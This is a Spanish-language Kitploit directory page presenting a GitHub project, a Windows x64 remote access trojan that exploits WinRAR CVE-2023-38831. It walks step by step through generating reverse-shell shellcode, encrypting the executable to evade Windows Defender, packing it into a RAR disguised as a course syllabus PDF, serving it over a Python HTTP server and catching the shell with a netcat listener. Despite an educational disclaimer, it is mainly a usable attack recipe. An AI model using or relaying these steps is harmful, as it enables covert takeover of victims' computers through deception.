Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Windows-X64-RAT — Troyano de Acceso Remoto (RAT) para Windows x64 que utiliza una combinación de la vulnerabilidad CVE-2023-38831 (vulnerabilidad de WinRAR < 6.23) y la técnica de explotación Shellcode. | Kitploit
Herramientas/GitHubGitHub/maorbuskila/windows-x64-rat
Análisis de VulnerabilidadesExplotaciónShellcodeComando y ControlAprendizaje y EducaciónDesarrollo de PayloadsTroyano de Acceso RemotoExplotación de Binarios
GitHubmaorbuskila/windows-x64-rat

Windows-X64-RAT

Troyano de Acceso Remoto (RAT) para Windows x64 que utiliza una combinación de la vulnerabilidad CVE-2023-38831 (vulnerabilidad de WinRAR < 6.23) y la técnica de explotación Shellcode.

Ver Repositorio
2hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Troyano de Acceso Remoto (RAT) para Windows x64

Objetivo

Desarrollar un RAT para Windows x64 utilizando CVE-2023-38831 (WinRAR < 6.23) y explotación de shellcode para evadir Windows Defender.

Descripción del Sistema

  1. Inicialización del Shellcode
    • Generar shellcode usando Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode.
  2. Explicación de main.cpp
    • Inyectar y ejecutar shellcode en memoria para establecer una conexión TCP inversa.
  3. Compilar y Cifrar main.cpp
    • Compilar el archivo C++ en un ejecutable y cifrarlo.
  4. Explotar WinRAR CVE-2023-38831
    • Usar la vulnerabilidad para descargar, descifrar y ejecutar el RAT cifrado.
  5. Descifrar y Ejecutar Script (decrypt_file.ps1)
    • Descifrar y ejecutar el ejecutable descargado.
  6. Ejecución
    • Abrir el PDF/imagen manipulado para activar la conexión de shell inversa.

Guía de Explotación

Advertencia: Esta información es solo para fines educativos. El uso no autorizado de estas técnicas es ilegal y no ético.

Instrucciones Paso a Paso

  1. Crear Shellcode

    • Usar 51721.py para generar el shellcode inicial.
  2. Modificar y Compilar el Shellcode

    • Realizar las modificaciones necesarias al shellcode.
    • Compilar el código modificado.
  3. Cifrar el Ejecutable

    • Usar decrypt_file.ps1 para cifrar el ejecutable compilado:
      root@kitploit:~
      .\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
      
  4. Crear un Archivo WinRAR

    • Usar cve-2023-38831-exp-gen.py para crear el archivo:
      root@kitploit:~
      python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
      
  5. Configurar un Servidor Python para Descarga de Archivos

    • Navegar al directorio que contiene enc_main.exe y decrypt_file.ps1.
    • Iniciar un servidor HTTP de Python:
      root@kitploit:~
      python3 -m http.server 8000
      
  6. Prepararse para Escuchar el Shell TCP Inverso

Descargo de Responsabilidad

Esta información se proporciona solo con fines educativos. El uso de este exploit sin permiso explícito es ilegal y no ético. El autor no asume ninguna responsabilidad por el mal uso de esta información.

Descargar herramienta
  • Abrir Netcat para escuchar conexiones TCP entrantes:
    root@kitploit:~
    nc -lnvp 4444
    
  • Activar el Shell TCP Inverso

    • Cuando la víctima abra el archivo PDF, se activará la conexión TCP inversa, dándote acceso a su máquina.